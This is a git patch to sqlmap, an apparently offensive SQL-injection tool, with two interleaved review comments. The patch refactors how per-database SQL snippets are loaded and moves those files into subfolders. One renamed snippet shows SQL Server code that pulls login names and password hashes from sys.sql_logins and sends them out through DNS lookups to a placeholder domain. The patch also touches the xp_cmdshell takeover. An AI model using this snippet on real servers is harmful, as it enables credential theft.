From 8d7912ad342b54919157fb86932a6423f4050742 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 15 Feb 2012 14:05:50 +0000
Subject: [PATCH] minor update and refactoring

---
 lib/core/common.py | 7 +++++--
 lib/core/enums.py | 14 +++++++++++++-
 lib/takeover/xp_cmdshell.py | 3 ++-
 procs/{ => mssqlserver}/configure_xp_cmdshell.txt | 0
 .../dns_request.txt} | 2 +-
 5 files changed, 21 insertions(+), 5 deletions(-)
 rename procs/{ => mssqlserver}/configure_xp_cmdshell.txt (100%)
 rename procs/{mssql_dns_request.txt => mssqlserver/dns_request.txt} (61%)

diff --git a/lib/core/common.py b/lib/core/common.py
index c51d9ebe8..a4631cb31 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -61,6 +61,7 @@ from lib.core.convert import unicodeencode
 from lib.core.convert import urldecode
 from lib.core.convert import urlencode
 from lib.core.enums import DBMS
+from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import HTTPHEADER
 from lib.core.enums import HTTPMETHOD
 from lib.core.enums import OS
@@ -1807,12 +1808,14 @@ def parseXmlFile(xmlFile, handler):
 parse(stream, handler)
 stream.close()
 
-def getSPLSnippet(name, **variables):
+def getSPLSnippet(dbms, name, **variables):
 """
 Returns content of SPL snippet located inside "procs" directory
 """
 
- filename = os.path.join(paths.SQLMAP_PROCS_PATH, "%s.txt" % name)
+ _ = { DBMS.MSSQL: DBMS_DIRECTORY_NAME.MSSQL, DBMS.PGSQL: DBMS_DIRECTORY_NAME.PGSQL }
+
+ filename = os.path.join(paths.SQLMAP_PROCS_PATH, _[dbms], "%s.txt" % name)
 checkFile(filename)
 retVal = readCachedFileContent(filename)
 
diff --git a/lib/core/enums.py b/lib/core/enums.py
index 704215c14..86c6aa31c 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -26,6 +26,7 @@ class SORT_ORDER:
 
 class DBMS:
 ACCESS = "Microsoft Access"
+ DB2 = "IBM DB2"
 FIREBIRD = "Firebird"
 MAXDB = "SAP MaxDB"
 MSSQL = "Microsoft SQL Server"
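Review bot: `_[dbms]` in getSPLSnippet maps only DBMS.MSSQL and DBMS.PGSQL, so any other value, including the other eight names DBMS_DIRECTORY_NAME introduces in this same commit, fails with a bare KeyError rather than a message naming the unsupported DBMS. A guarded lookup would make the failure readable, e.g. `directory = _.get(dbms)` followed by raising one of the existing lib.core.exception classes with the dbms value in the message when it is None. The mapping is also rebuilt on every call and named `_`; a module-level constant with a descriptive name would read better and would be the natural place to keep it in step with DBMS_DIRECTORY_NAME. Inserting `dbms` as a new first positional parameter changes every existing call site, and only the xp_cmdshell caller is updated here, so any other caller in the tree (for instance one loading the renamed dns_request snippet, if it exists) would need the same update. getSPLSnippet's body continues outside the hunk.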
@@ -34,7 +35,18 @@ class DBMS:
 PGSQL = "PostgreSQL"
 SQLITE = "SQLite"
 SYBASE = "Sybase"
- DB2 = "IBM DB2"
+
+class DBMS_DIRECTORY_NAME:
+ ACCESS = "access"
+ DB2 = "db2"
+ FIREBIRD = "firebird"
+ MAXDB = "maxdb"
+ MSSQL = "mssqlserver"
+ MYSQL = "mysql"
+ ORACLE = "oracle"
+ PGSQL = "postgresql"
+ SQLITE = "sqlite"
+ SYBASE = "sybase"
 
 class CUSTOM_LOGGING:
 PAYLOAD = 9
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 87338dd84..ce41b168c 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -17,6 +17,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
+from lib.core.enums import DBMS
 from lib.core.exception import sqlmapUnsupportedFeatureException
 from lib.core.session import setXpCmdshellAvailability
 from lib.core.unescaper import unescaper
@@ -63,7 +64,7 @@ class xp_cmdshell:
 debugMsg += "stored procedure"
 logger.debug(debugMsg)
 
- cmd = getSPLSnippet("configure_xp_cmdshell", ENABLE=str(mode))
+ cmd = getSPLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode))
 
 return cmd
 
diff --git a/procs/configure_xp_cmdshell.txt b/procs/mssqlserver/configure_xp_cmdshell.txt
similarity index 100%
rename from procs/configure_xp_cmdshell.txt
rename to procs/mssqlserver/configure_xp_cmdshell.txt
diff --git a/procs/mssql_dns_request.txt b/procs/mssqlserver/dns_request.txt
similarity index 61%
rename from procs/mssql_dns_request.txt
rename to procs/mssqlserver/dns_request.txt
index b46f6bac9..c97a469fb 100644
--- a/procs/mssql_dns_request.txt
+++ b/procs/mssqlserver/dns_request.txt
@@ -1,4 +1,4 @@
-# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
+# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
 DECLARE @host varchar(1024);
 SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
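Review bot: DBMS_DIRECTORY_NAME carries no comment saying what its values are, even though the getSPLSnippet change in this commit treats them as subdirectory names under paths.SQLMAP_PROCS_PATH and the two renames on this page land under procs/mssqlserver/ to match DBMS_DIRECTORY_NAME.MSSQL. A short header comment would record that contract, e.g. `# Name of the subdirectory of "procs" holding the SPL snippets for each DBMS; attribute names mirror those of class DBMS and must be kept in step`. Without it, adding a DBMS to one class but not the other is easy to miss, since nothing in the code checks that the two attribute sets stay aligned.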